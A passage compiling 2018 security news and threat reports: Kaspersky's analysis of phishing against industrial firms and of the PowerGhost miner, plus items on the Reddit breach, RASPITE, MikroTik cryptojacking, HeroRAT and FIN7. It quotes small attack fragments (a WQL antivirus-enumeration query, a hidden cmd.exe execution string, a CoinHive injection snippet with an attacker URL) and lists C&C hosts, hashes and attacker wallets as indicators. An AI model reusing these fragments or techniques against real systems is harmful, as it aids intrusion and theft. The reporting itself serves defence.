Screenshot of decrypted contents of the malware configuration file

Unlike RMS, Team Viewer uses a built-in VPN to remotely control a computer located behind NAT.

As in the case of RMS, the relevant value is added to the RunOnce registry key to ensure that the malware runs automatically at system startup.

The malware collects data on the infected machine and sends it to the command-and-control server along with the system’s identifier needed for remote administration. The data sent includes:

Operating system version
User name
Computer name
Information on the privilege level of the user on whose behalf the malware is running
Whether or not a microphone and a webcam are present in the system
Whether or not antivirus software or other security solutions are installed, as well as the UAC level
Information about security software installed in the system is obtained using the following WQL query:

root\SecurityCenter:SELECT * FROM AntiVirusProduct

The information collected is sent to the attackers’ server using the following POST request:

POST request used to send encrypted data to the command-and-control server

Another distinguishing feature of attacks that involve the TeamViewer is the ability to send commands to an infected system and have them executed by the malware. Commands are sent from the command-and-control server using the chat built into the TeamViewer application. The chat window is also hidden by the malicious library and the log files are deleted.

A command sent to an infected system is executed in the Windows command interpreter using the following instruction:

cmd.exe /c start /b

The parameter “/b” indicates that the command sent by the attackers for execution will be run without creating a new window.

The malware also has a mechanism for self-destructing if the appropriate command is received from the attackers’ server.

The use of additional malware
In cases where attackers need additional data (authorization data, etс.), they download spyware to victim computers in order to collect logins and passwords for mailboxes, websites, SSH/FTP/Telnet clients, as well as logging keystrokes and making screenshots.

Additional software hosted on the attackers’ servers and downloaded to victims’ computers was found to include malware from the following families:

Babylon RAT
Betabot/Neurevt
AZORult stealer
Hallaj PRO Rat
In all probability, these Trojans were downloaded to compromised systems and used to collect information and steal data. In addition to remote administration, the capabilities of malware from these families include:

Logging keystrokes
Making screenshots
Collecting system information and information on installed programs and running processes
Downloading additional malicious files
Using the computer as a proxy server
Stealing passwords from popular programs and browsers
Stealing cryptocurrency wallets
Stealing Skype correspondence
Conducting DDoS attacks
Intercepting and spoofing user traffic
Sending any user files to the command-and-control server
In other cases observed, after an initial analysis of an infected system, the attackers downloaded an additional malware module to the victim’s computer – a self-extracting archive containing various malicious and legitimate programs, which were apparently individually selected for each specific system.

For example, if the malware had previously been executed on behalf of a user who did not have local administrator privileges, to evade the Windows User Account Control (UAC), the attackers used the DLL hijacking technique mentioned above, but this time on a Windows system file, %systemdir%\migwiz\migwiz.exe, and a library, cryptbase.dll.

Additionally, another remote administration utility, RemoteUtilities, which provides a more extensive feature set for controlling an infected machine than RMS or TeamViewer, has been installed in some systems. Its capabilities include:

Remotely controlling the system (RDP)
Transferring files to and from the infected system
Controlling power on the infected system
Remotely managing the processes of running application
Remote shell (command line)
Managing hardware
Capturing screenshots and screen videos
Recording sound and video from recording devices connected to the infected system
Remote management of the system registry
The attackers use a modified build of RemoteUtilities, which enables them to perform the above operations without the user’s knowledge.

In some cases, the Mimikatz utility was installed in addition to cryptbase.dll and RemoteUtilities. We believe that the attackers use Mimikatz in cases when the first system infected is not one that has software for working with financial data installed on it. In these cases, the Mimikatz utility is used to steal authentication data from the organization’s employees and gain remote access to other machines on the enterprise’s network. The use of this technique by the attackers poses a serious danger: if they succeed in obtaining the account credentials for the domain administrator’s account, this will give them control of all systems on the enterprise’s network.

Attack targets
According to KSN data, from October 2017 to June 2018, about 800 computers of employees working at industrial companies were attacked using the malware described in this paper.

Number of computers attacked by month. October 2017 – June 2018

According to our estimate, at least 400 industrial companies in Russia have been targeted by this attack, including companies in the following industries:

Manufacturing
Oil and gas
Metallurgy
Engineering
Energy
Construction
Mining
Logistics
Based on this, it can be concluded that the attackers do not concentrate on companies in any specific industry or sector. At the same time, their activity clearly demonstrates their determination to compromise specifically systems belonging to industrial companies. This choice on the part of the cybercriminals could be explained by the fact that the threat awareness and cybersecurity culture in industrial companies is inferior to that in companies from other sectors of the economy (such as banks or IT companies). At the same time, as we have noted before, it is more common for industrial companies than for companies in other sectors to conduct operations involving large amounts of money on their accounts. This makes them an even more attractive target for cybercriminals.

Conclusions
This research demonstrates once again that even when they use simple techniques and known malware, threat actors can successfully attack many industrial companies by expertly using social engineering and masking malicious code in target systems. Criminals actively use social engineering to keep users from suspecting that their computers are infected. They also use legitimate remote administration software to evade detection by antivirus solutions.

This series of attacks targets primarily Russian organizations, but the same tactics and tools can be used in attacks against industrial companies in any country of the world.

We believe that the threat actor behind this attack is highly likely to be a criminal group whose members have a good command of Russian. This is indicated by the high level at which texts in Russian are prepared for phishing emails used in the attack, as well as the attackers’ ability to make changes to organizations’ financial data in Russian. More data about the research on the infrastructure and language used by the attackers is available in the private version of the report on the Treat Intelligence portal.

Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of the victim companies’ employees, and record audio and video using devices connected to infected machines.

The various malware components used in this attack are detected by Kaspersky Lab products with the following verdicts:

Trojan.BAT.Starter
Trojan.Win32.Dllhijack
Trojan.Win32.Waldek
Backdoor.Win32.RA-based
Backdoor.Win32.Agent


Student Charged in Elaborate Digital Money Theft Scheme

3.8.2018 securityweek Hacking

LOS ANGELES (AP) — A Massachusetts college student who was named his high school's valedictorian for his savvy tech skills hacked into unsuspecting investors' personal cellphones, email and social media accounts to steal at least $2 million in digital currency like Bitcoin, according to documents provided by California prosecutors Wednesday.

Joel Ortiz was taken into custody July 12 at Los Angeles International Airport ahead of a flight to Boston, according to prosecutors. The 20-year-old faces more than two dozen charges including grand theft, identity theft and computer hacking, court documents show. He's held on $1 million bail.

The Santa Clara County, California, public defender's office, which is representing Ortiz, declined comment. A number listed for his home in Boston was disconnected.

The elaborate scheme involved taking over victims' phones, allowing him to reset passwords and access online accounts containing electronic assets in the form of Bitcoin, Coinbase, Bittrex and Binance, the criminal complaint said.

In one case Ortiz allegedly walked into an AT&T store and impersonated a victim in order to get a new SIM card, which gave him control of the victim's phone. He obtained access to the victim's "financial and personal identifying information, tax returns, private passwords" and siphoned $10,000 from a cryptocurrency account, according to police report.

In several instances Ortiz allegedly impersonated victims over text messages and convinced friends and family members to "loan" him digital funds, court documents said.

At one point Ortiz allegedly stole $10,000 from a California resident, and then tried to get more, calling the victim's wife and sending a text to the victim's daughter that said "TELL YOUR DAD TO GIVE US BITCOIN," the documents said.

Court documents identify more than 20 victims who live in California, and prosecutors say they know of additional victims outside of the state.

Ortiz enrolled at the University of Massachusetts Boston and studies information technology, said school spokesman DeWayne Lehman.

Ortiz was the 2016 valedictorian of Another Course to College, a small public college preparatory school in Boston, and was honored alongside other top students across the city at a luncheon that year with Democratic Mayor Marty Walsh and other officials at a downtown hotel.

At his school, Ortiz was the lead robot software programmer on its robotics team, taught other students the basics of software coding and "led efforts to teach computer science," according to a Boston Public Schools' press release touting the students' accomplishments.

The school system said Ortiz "loves science and technology," is fluent in Spanish and speaks conversational Chinese.

Boston Public Schools spokesman Daniel O'Brien declined to comment.


Cisco to Acquire Duo Security for $2.35 Billion in Cash

3.8.2018 securityweek IT

Cisco announced on Thursday that it will pay $2.35 billion in cash to acquire cloud-based identity and access management solutions provider Duo Security.

Ann Arbor, Michigan-based Duo raised $70 million in Series D funding in October 2017, which valued the company at $1.17 billion at the time.

Through its flagship two-factor authentication (2FA) app, Duo's "Trusted Access" product suite helps verify the identity of users, and the health of their devices, before granting them access to applications. The platform supports Macs, PCs and mobile devices, and gives administrators visibility into end user devices accessing the corporate network.

Duo Security Logo“Integration of Cisco's network, device and cloud security platforms with Duo Security's zero-trust authentication and access products will enable Cisco customers to easily and securely connect users to any application on any networked device,” Cisco said.

Overall, Cisco says that by getting its hands on Duo’s technology, it will be able to extend intent-based networking into multi-cloud environments, simplify policy for cloud security, and expand endpoint visibility coverage.

The acquisition is expected to close during the first quarter of Cisco's fiscal year 2019, subject to customary closing conditions and required regulatory approvals.

Duo said previously that it has doubled its annual recurring revenue for the past four years, and currently has more than 500 employees globally, after doubling its headcount in 2016.

Duo serves more than 10,000 paying customers and said protects more than 300 million logins worldwide every month. Customers include Facebook, Etsy, Facebook, K-Swiss, Paramount Pictures, Toyota, Random House, Yelp, Zillow and more.

In addition to its Ann Arbor, Michigan headquarters, Duo currently maintains offices in Austin, Texas; San Mateo, California; and London, England.

Duo Security, which will continue to be led by Dug Song, Duo Security's co-founder and chief executive officer, will join Cisco's Networking and Security business led by EVP and GM David Goeckeler.

Cisco has acquired several emering security companies over the years. In June 2015, it announced its acquisition of OpenDNS for $635 Million. The move followed other acquisitions by Cisco in the security sector, including its acquisition of Porcullis, ThreatGRID, Neohapsis, Virtuata, and its $2.7 billion acquistionof Sourcefire in 2013. In June 2016, it agreed to pay $293 million to acquire cloud access security broker (CASB) CloudLock.


Attackers Circumvent Two Factor Authentication Protections to Hack Reddit

3.8.2018 securityweek Crypto

Popular Community Site Reddit Breached Through Continued Use of NIST-Deprecated SMS Two Factor Authentication (2FA)

Online community site Reddit announced Wednesday that it was breached in June 2018. In a refreshingly candid advisory, it provides a basic explanation of how the incident occurred, details on the extent of the breach, details on its own response, and advice to potential victims.

The extent of the breach was limited. It was discovered on June 19, and occurred between June 14 and June 18, this year. "A hacker broke into a few of Reddit's systems and managed to access some user data, including some current email addresses and a 2007 database backup containing old salted and hashed passwords," announced Chris Slowe, CTO and founding engineer at Reddit.

With more than 330 million active monthly users, Reddit is home to thousands of online communities where users can share stories and host public discussions.

Apart from the limited extent, it was also limited in scope. "The attacker did not gain write access to Reddit systems; they gained read-only access to some systems that contained backup data, source code and other logs." This comprises a complete copy of an old database backup including account credentials and email addresses (2005 to 2007); logs containing email digests sent between June 3 and June 17, 2018; and internal data such as source code, internal logs, configuration files and other employee workspace files.

"The disclosure of email addresses and their connected Reddit usernames," warns Jessica Ortega, a security researcher at SiteLock, "could potentially mean attackers can identify and dox users -- that is, release personally identifying information -- who rely on Reddit for discussing controversial topics or posting controversial images. It is recommended that all Reddit users update their passwords."

Reddit's response to the breach has been to report the incident to, and cooperate with, law enforcement; to contact users who may be impacted; and to strengthen its own privileged access controls with enhanced logging, more encryption and required token-based 2FA. It also advises all users to move to token-based 2FA.

This advice is because it believes the breach occurred through SMS intercept on one of its own employees. "We learned that SMS-based authentication is not nearly as secure as we would hope, and the main attack was via SMS intercept."

This last comment has raised eyebrows. As long ago as 2016, NIST denounced SMS 2FA. "Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators," it stated in the DRAFT NIST Special Publication 800-63B.

The most common attack against SMS 2FA, explains Joseph Kucic, CSO at Cavirin, is mobile device malware designed to capture/intercept SMS messages -- a major feature for use against mobile banking apps. But, he adds, "SMS messages have had other risks: SIM swap and unauthorized access from SS7 (core telco signaling environments) -- these issues have been known and discussed in the security circles for years."

While Reddit doesn't make it clear whether the 'intercept' was via malware on an employee's mobile device or via flaws in the SS7 telecommunications protocol, the latter seems the most likely. SS7 is a telephony signaling protocol initially developed in 1975, and it has become deeply embedded in mobile telephone routing. As such it is unlikely to be corrected or replaced in the immediate future -- but the effect is that almost any mobile telephone conversation anywhere in the world can be intercepted by an advanced adversary.

The fact that SS7 attacks are not run-of-the-mill events makes Tom Kellermann, CSO at Carbon Black, wonder who might be behind the attack. "The Reddit breach seems to be more tradecraft-oriented," he told SecurityWeek. "They were victimized, but by whom: more than likely a nation-state given their capacity to influence Americans. I hope that they were not used to island hop into other victims' systems via a watering hole." According to Carbon Black research, 36% of cyberattacks attempt to leapfrog through the victims' systems into their customers' systems.

He is not alone in wondering if there may be more to this breach. "I am concerned that Reddit seems to be playing down the data breach as it was only read access to sensitive data and not write. This is positive news; however, it does not reduce the severity of the data breach when it relates to sensitive data," comments Joseph Carson, chief security scientist at Thycotic.

Of course, the attack may not have been effected via the SS7 flaws. "In this type of attack, the phone number is the weakest link," warns Tyler Moffit, senior threat research analyst at Webroot. "Cybercriminals can steal a victim's phone number by transferring it to a different SIM card with relative ease, thereby getting access to text messages and SMS-based authentication. For example, a cybercriminal would simply need to give a wireless provider an address, last 4 digits of a social security number, and perhaps a credit card to transfer a phone number. This is exactly the type of data that is widely available on the dark web thanks to large database breaches like Equifax."

"When Reddit started using SMS for Two Factor Authentication in 2003 it was a best practice," Joseph Kucic, CSO at Cavirin told SecurityWeek; adding, "The one fact about any security technology is that its effectiveness decreases over time for various reasons -- and one needs to take inventory of the deployed security effectiveness at least annually." He believes that security technologies, just like applications, have a product lifecycle, "and there is a point when an end-of-life should be declared before unauthorized individuals -- hackers or nation/state actors -- do it for you."

Reddit has earned plaudits for its breach notification as well as criticism for its continued use of SMS 2FA. "The level of detail Reddit provides," said Chris Morales, head of security analytics at Vectra, "is more than many larger organizations have provided on much more significant breaches. These details are based on an investigation and explain what happened during the breach -- how the attackers infiltrated the network and what exactly they gained access to -- and most importantly disclosed Reddit's internal processes to address the breach, including the hiring of new and expanded security staff."

Ilia Kolochenko, CEO at High-Tech Bridge, makes the point that despite Reddit's apparent openness, we still don't know everything about the breach. "Often, large-scale attacks are conducted in parallel by several interconnected cybercrime groups aimed to distract, confuse and scare security teams," he comments. "While attack vectors of the first group are being mitigated, others are actively exploited, often not without success. Otherwise, the disclosure and its timeline are done quite well done by Reddit."

He also cautions against placing too much blame on Reddit's use of SMS 2FA. "I would refrain from blaming the 2FA SMS -- in many cases it's still better than nothing. Moreover, when most of business-critical applications have serious vulnerabilities varying from injections to RCE, 2FA hardening is definitely not the most important task to take care of."

Nevertheless, the consensus is that Reddit should be applauded for its disclosure, but censured for its use of SMS 2FA. "Reddit won't be the last organization to be breached via SMS authentication in the future," comments Sean Sullivan, security advisor at F-Secure. "At this point, the use of SMS-based MFA for administrators should be considered negligent."


Phishing Campaign Targets 400 Industrial Organizations

3.8.2018 securityweek Phishing

A new wave of spear-phishing emails masquerading as legitimate procurement and accounting letters have hit over 400 industrial organizations, according to Kaspersky Lab.

Data collected by Kaspersky showed that the malware associated with the campaign attacked nearly 800 company PCs across various industries. The attacks, which are ongoing, attempt to steal money and confidential data from the targeted organizations, which include oil and gas to metallurgy, energy, construction and logistics.

The spear-phishing emails, Kaspersky’s security researchers discovered, are tailored with “content that corresponded to the profile of the attacked organizations and took into account the identity of the employee – the recipient of the letter.”

“This suggests that the attacks were carefully prepared and that criminals took the time to develop an individual letter for each user,” the researchers say.

The emails either contain malicious attachments designed to silently install modified legitimate software onto the victim’s machine, such as TeamViewer or Remote Manipulator System/Remote Utilities (RMS), or try to trick victims into following external links and downloading malicious objects from there.

Analysis of the attacks has revealed the use of various techniques to mask the presence of malware on the system. Incidents involving RMS software relied on exfiltrating data over email, while those abusing legitimate TeamViewer software sent the data directly to a command and control (C&C) server.

The main goals of these attacks is to steal money from the victim organizations’ accounts. After gaining access to a victim’s system and gathering required information by accessing documents and financial and accounting software, the attackers would engage in various financial fraud operations, such as spoofing the bank details used to make payments.

When needed, the attackers would also upload additional malware onto the compromised machines, specifically crafted for each attack. They have been using spyware, remote administration tools to expand their control over the infected systems, Mimikatz, and malware to exploit different vulnerabilities in the operating system.

Some of the malicious programs found on compromised machines includes the Babylon RAT, Betabot/Neurevt, AZORult stealer, Hallaj PRO Rat families. These allowed attackers to log keystrokes, take screenshots, collect system information, download additional malware, steal passwords and crypto-currency wallets, intercept traffic, and conduct distributed denial of service (DDoS) attacks.

In some attacks, the remote administration tool called RemoteUtilities was used to remotely control the infected system, transfer files, manage running applications, manage hardware, remote shell, capture screenshots and screen videos, and record audio and video.

While the attacks did not appear to concentrate on companies in a specific industry or sector, the actors did focus on compromising systems belonging to industrial companies. Furthermore, most of the organizations that were hit are located in Russia, Kaspersky said.

“The attackers demonstrated a clear interest in targeting industrial companies in Russia. Based on our experiences, this is likely to be due to the fact that their level of cybersecurity awareness is not as high as it is in other markets, such as financial services. That makes industrial companies a lucrative target for cybercriminals – not only in Russia, but across the world,” Vyacheslav Kopeytsev, security expert, Kaspersky Lab, said.


Iran-Linked Actor Targets U.S. Electric Utility Firms
3.8.2018 securityweek CyberSpy

Likely operating out of Iran, the Leafminer cyber-espionage group has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.

The group was previously said to have been targeting government and other types of organizations in the Middle East since at least early 2017, but it appears that its target list is much broader.

Dragos, which calls the actor RASPITE, says the entity has been targeting industrial control systems in numerous countries, including access operations in the electric utility sector in the United States.

Initial access to target networks is obtained through strategic website compromise (also known as watering hole attacks), the security firm says. Similar to DYMALLOY and ALLANITE threat actors, the group embeds a link to a resource to prompt an SMB connection to harvests Windows credentials.

Next, the actor deploys scripts to install a malicious service that connect to the RASPITE-controlled infrastructure and provide remotely access the victim machine.

Although it did focus on ICS-operating entities, RASPITE has yet to demonstrated an ICS-specific capability. At the moment, there is no indication that the actor can launch destructive ICS attacks such as the widespread blackouts that hit Ukraine.

In a report on the group last week, Symantec revealed that both custom-built malware and publicly-available tools were leveraged in observed campaigns, including a modified version of Mimikatz. Some of the tools were linked to other groups apparently tied to Iran, Symantec said, noting that the actor appears to be inspired by the Russia-linked Dragonfly group.

“Dragos caught RASPITE early in its maturity which is ideal as it allows us to track its behavior and threat progression to help organizations defend against them. RASPITE uses common techniques which is good because defenders with sufficient monitoring can catch them and mitigate any opportunity for them to get better,” Sergio Caltagirone, Director of Threat Intelligence, Dragos, said.

“At this time we are limiting the amount of information in our public reports to avoid the proliferation of ideas or tradecraft to other activity groups,” Caltagirone continued.


Hundreds of thousands MikroTik Routers involved in massive Coinhive cryptomining campaign
3.8.2018 securityaffairs Cryptocurrency

Experts uncovered a massive cryptojacking campaign that is targeting MikroTik routers to inject a Coinhive cryptocurrency mining script in the web traffic.
Security experts have uncovered a massive cryptojacking campaign that is targeting MikroTik routers, the hackers aim to change the configuration of the devices to inject a Coinhive cryptocurrency mining script in the users’ web traffic.

The campaign was first spotted by the researcher who goes online with the Twitter handle MalwareHunterBR.

MalwareHunterBR
@MalwareHunterBR
another mass exploitation against @mikrotik_com devices (https://github.com/mrmtwoj/0day-mikrotik …)
hxxp://170.79.26.28/
CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', #coinhive

1:31 PM - Jul 30, 2018
45
38 people are talking about this
Twitter Ads info and privacy
According to Catalin Cimpanu from Bleeping Computer, the campaign first started in Brazil, but it is rapidly expanding to other countries targeting MikroTik routers all over the world.

The same campaign was monitored by the experts at Trustwave that confirmed that campaign initially targeted MikroTik routers used by Brazilians.

“On July 31st , just after getting back to the office from my talk at RSA Asia 2018 about how cyber criminals use cryptocurrencies for their malicious activities, I noticed a huge surge of CoinHive in Brazil.” reads the report published by Trustwave.

“After a quick look I saw that this is not your average garden variety website compromise, but that these were all MikroTik network devices.”

The experts noticed that the compromised devices were all using the same CoinHive sitekey, most of them in Brazil, this means that they were targeted by the same attackers.

MikroTik routers compromised

According to Trustwave the hackers were exploiting a zero-day flaw in the MikroTik routers to inject a copy of the Coinhive library in the traffic passing through the MikroTik router.

“Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited.” continues the analysis.

The vulnerability was discovered in April and patched by the vendor in just one day.

Technical details for the MikroTik flaw were publicly disclosed in May, public proof-of-concept (PoC) codes for the issue were published on GitHub.
Trustwave pointed out that many users that weren’t using the MikroTik routers were affected too because Internet providers and big organizations leverage MikroTik routers compromised by hackers.

The experts noticed that the threat actors once discovered to have been spotted by the experts switched tactics and injected the Coinhive script only in error pages returned by the routers.

After the initial phase, the campaign was targeting devices outside Brazil, and it has been estimated that roughly 170,000 MikroTik routers were compromised to inject the Coinhive script. The campaign can potentially compromise over a million of MikroTik routers exposed on the Internet.

“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” concludes the experts.

“Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker.”


Analyzing the Telegram-based Android remote access trojan HeroRAT
3.8.2018 securityaffairs Android

Researchers at CSE Cybsec ZLab analyzed shared published their analysis of the Telegram-based Android RAT tracked as HeroRAT.
In June, researchers from security firm ESET discovered a new family of Android Remote Administration Tool (RAT), dubbed HeroRAT, that leverages the Telegram BOT API to communicate with the attacker.

The use of Telegram API can be considered a new trend in Android RAT landscape, because other RAT families implementing the same functionalities, such as TeleRAT and IRRAT, were discovered in the wild before HeroRAT.

HeroRAT appeared very active in Iran where it was spreading through third-party app stores, through tainted social media and messaging apps.

ESET experts speculate that the HeroRAT borrows the source code of a malware appeared in the hacking community in March 2018, however, it has some characteristics that distinguish it different from IRRAT and TeleRAT. One of these features is the usage of the Xamarin Framework and TeleSharp Library for the development of the RAT.

HeroRAT is offered for sale on a dedicated Telegram channel, the author offers three different variants depending on its functionalities: bronze (25 USD), silver (50 USD) and gold panels (100 USD). The malware author also released a demo video in which explains the RAT functionalities; below we have a screenshot from this demo video, showing the differences between the three variants.

Figure 1 – Differences between the RAT variants

Further details on the RAT analyzed by CSE Cybsec, including the IoCs and Yara Rules are available in the report published by researchers at ZLAb.


Three members of FIN7 (Carbanak) gang charged with stealing 15 million credit cards
3.8.2018 securityweek  CyberCrime

Three members of the cybercrime group tracked as FIN7 and Carbanak have been indicted and charged with 26 felony counts
Three members of the notorious cybercrime gang known as FIN7 and Carbanak have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The gang stole over a billion euros from banks across the world, the name “Carbanak” comes with the name of the malware they used to compromise computers at banks and other financial institutions. The three suspects (Dmytro Fedorov, 44, Fedir Hladyr, 33, and Andrii Kopakov, 30) are Ukrainians, they were arrested last year in Europe between January and June.

Fedorov, is a skilled hacker and, who is suspected to be a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently waiting for his extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany, he is currently detained in Seattle pending trial. Hladyr is suspected to be a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain. The man is suspected to be a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

According to DoJ, the suspects stole more than 15 million credit cards from over 6,500 individual point-of-sale terminals at 3,600 business locations in 47.

“Three high-ranking members of a sophisticated international cybercrime group operating out of Eastern Europe have been arrested and are currently in custody facing charges filed in U.S. District Court in Seattle, announced Assistant Attorney General Brian A.” reads the press release published by the DoJ.

“In the United States alone, FIN7 successfully breached the computer networks of companies in 47 states and the District of Columbia, stealing more than 15 million customer card records from over 6,500 individual point-of-sale terminals at more than 3,600 separate business locations. “

FIN7

“The three Ukrainian nationals indicted today allegedly were part of a prolific hacking group that targeted American companies and citizens by stealing valuable consumer data, including personal credit card information, that they then sold on the Darknet,” said Assistant Attorney General Benczkowski. “Because hackers are committed to finding new ways to harm the American public and our economy, the Department of Justice remains steadfast in its commitment to working with our law enforcement partners to identify, interdict, and prosecute those responsible for these threats.”
The trio has been accused of targeting hundreds of companies in the United States, and U.S. individuals. The list of victims is long and includes Chipotle Mexican Grill, Jason’s Deli, Sonic Drive-in, and Arby’s.

According to the European authorities, FIN7 developed sophisticated banking trojan tracked as Cobalt, based on the Cobalt Strike penetration testing tool, that was spread through spear-phishing campaigns aimed at employees at different banks.

Once infected the victims’ PC with Carbanak malware, the hackers attempted to identify key people authorized to transfer money from the banks in order to make transactions to fake accounts or ATMs under the control of the gang.

The three men could face many years in prison if convicted.


Alleged Iran-linked APT group RASPITE targets US electric utilities
3.8.2018 securityaffairs APT

According to Dragos firm, the RASPITE cyber-espionage group (aka Leafminer) has been targeting organizations in the United States, Europe, Middle East, and East Asia.
Researchers from security firm Dragos reported that a group operating out of Iran tracked as RASPITE has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.

The group has been active at least since 2017, researchers uncovered operations aimed at government and other types of organizations in the Middle East.

“Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE.” read a blog post published by Dragos.

“Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time.”

Last week, experts from Symantec who tracked the group as Leafminer published a detailed report on the activity of the cyber espionage team who leveraged both custom-built malware and publicly-available tools in observed campaigns.

According to Symantec, the extent of the campaigns conducted by the group could be wider, the researchers uncovered a list, written in Iran’s Farsi language, of 809 targets whose systems were scanned by the attackers.

The list groups each entry with organization of interest by geography and industry, in includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Now researchers from Dragos confirmed that the RASPITE is behind attacks that has been targeting industrial control systems in several states.

According to the experts, the hackers also accessed operations in the electric utility sector in the United States.

The hackers carry on watering hole attacks leveraging compromised websites providing content of interest for the potential victims.

RASPITE attacks appear similar to the ones conducted by other threat actors like DYMALLOY and ALLANITE, the hackers injected in the websites links to a resource to prompt an SMB connection with the intent to gather Windows credentials.

Then, the attackers deploy scripts to install a malware that connects to C&C ad give then attacker the control of the compromised machine.

RASPITE attacks

According to Dragos, even if RASPITE has mainly focused on ICS systems, at the time there is no news about destructive attacks on such kind of devices.

“RASPITE’s activity to date currently focuses on initial access operations within the electric utility sector. Although focused on ICS-operating entities, RASPITE has not demonstrated an ICS-specific capability to date.” continues Dragos.

“This means that the activity group is targeting electric utilities, but there is no current indication the group has the capability of destructive ICS attacks including widespread blackouts like those in Ukraine.”

Sergio Caltagirone, Director of Threat Intelligence, Dragos, explained that his firm provided only limited information on the activity of the group to avoid “proliferation of ideas or tradecraft to other activity groups.”


A mining multitool

2.8.2018 Kaspersky  Cryptocurrency
Symbiosis of PowerShell and EternalBlue for cryptocurrency mining
Recently, an interesting miner implementation appeared on Kaspersky Lab’s radar. The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system. It appears the growing popularity and rates of cryptocurrencies have convinced the bad guys of the need to invest in new mining techniques – as our data demonstrates, miners are gradually replacing ransomware Trojans.

Technical description and propagation method
PowerGhost is an obfuscated PowerShell script that contains the core code and the following add-on modules: the actual miner, mimikatz, the libraries msvcp120.dll and msvcr120.dll required for the miner’s operation, a module for reflective PE injection and a shellcode for the EternalBlue exploit.

Fragment of the obfuscated script

The add-on modules encoded in base64

The malicious program uses lots of fileless techniques to remain inconspicuous to the user and undetected by antivirus technologies. The victim machine is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). During infection, a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.

What the script does after that can be broken down into several stages:

Automatic self-update. PowerGhost checks if a new version is available on the C&C. If there is, it downloads the new version and launches it instead of itself.

Propagation.With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.
PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (MS17-010, CVE-2017-0144).
Escalation of privileges. As the miner spreads via mimikatz and WMI, it may end up on a new machine with user rights. It will then attempt to escalate its privileges in the system with the 32- or 64-bit exploits for MS16-032, MS15-051 and CVE-2018-8120.
Establishing a foothold in the system. PowerGhost saves all the modules as properties of a WMI class. The miner’s body is saved in the form of a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

Payload.Lastly, the script launches the miner by loading a PE file via reflective PE injection.
In one PowerGhost version, we detected a tool for conducting DDoS attacks. The malware writers obviously decided to make some extra money by offering DDoS services.

PowerShell function with the tell-tale name RunDDOS

It’s worth pointing out that this is the only one of the miner’s functions that copies files to the hard drive. This is quite possibly a test tool that will later be replaced with a fileless implementation. Also supporting the assertion that this function was added to this version as an afterthought is the peculiar way the DDoS module is launched: the script downloads two PE modules, logos.png and cohernece.txt. The former is saved to the hard drive as java-log-9527.log and is an executable file for conducting DDoS attacks. The file cohernece.txt is protected with the software protection tool Themida, complete with a check for execution in a virtual environment. If the check does not detect a sandbox, then cohernece.txt launches the file java-log-9527.log for execution. In this curious way, the ready DDoS module was supplemented with a function to check for execution in a virtual environment.

Fragment of disassembled code of the file cohernece.txt

Statistics and geography
Corporate users bore the brunt of the attack: it’s easier for PowerGhost to spread within a company’s local area network.

Geography of infections by the miner

PowerGhost is encountered most often in India, Brazil, Columbia and Turkey.

Kaspersky Lab’s products detect the miner and/or its components with the following verdicts:

PDM:Trojan.Win32.Generic
PDM:Exploit.Win32.Generic
HEUR:Trojan.Win32.Generic
not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen
E-wallets at nanopool.org and minexmr.com:

43QbHsAj4kHY5WdWr75qxXHarxTNQDk2ABoiXM6yFaVPW6TyUJehRoBVUfEhKPNP4n3JFu2H3PNU2Sg3ZMK85tPXMzTbHkb
49kWWHdZd5NFHXveGPPAnX8irX7grcNLHN2anNKhBAinVFLd26n8gX2EisdakRV6h1HkXaa1YJ7iz3AHtJNK5MD93z6tV9H

Indicators of compromise
C&C hostnames:
update.7h4uk[.]com
185.128.43.62
info.7h4uk[.]com
MD5:
AEEB46A88C9A37FA54CA2B64AE17F248
4FE2DE6FBB278E56C23E90432F21F6C8
71404815F6A0171A29DE46846E78A079
81E214A4120A4017809F5E7713B7EAC8


Darknet Market Spokesman Gets Nearly 4 Years in Prison
2.8.2018 securityweek Crime

ATLANTA (AP) — A man who promoted an international criminal online marketplace and assisted people using it for illicit transactions was sentenced Tuesday in Atlanta to serve nearly four years in federal prison.

Ronald L. Wheeler III of Streamwood, Illinois, worked for about two years as a public relations specialist for AlphaBay, which authorities have said was the world's leading "darknet" marketplace when an international law enforcement effort shut it down in July 2017.

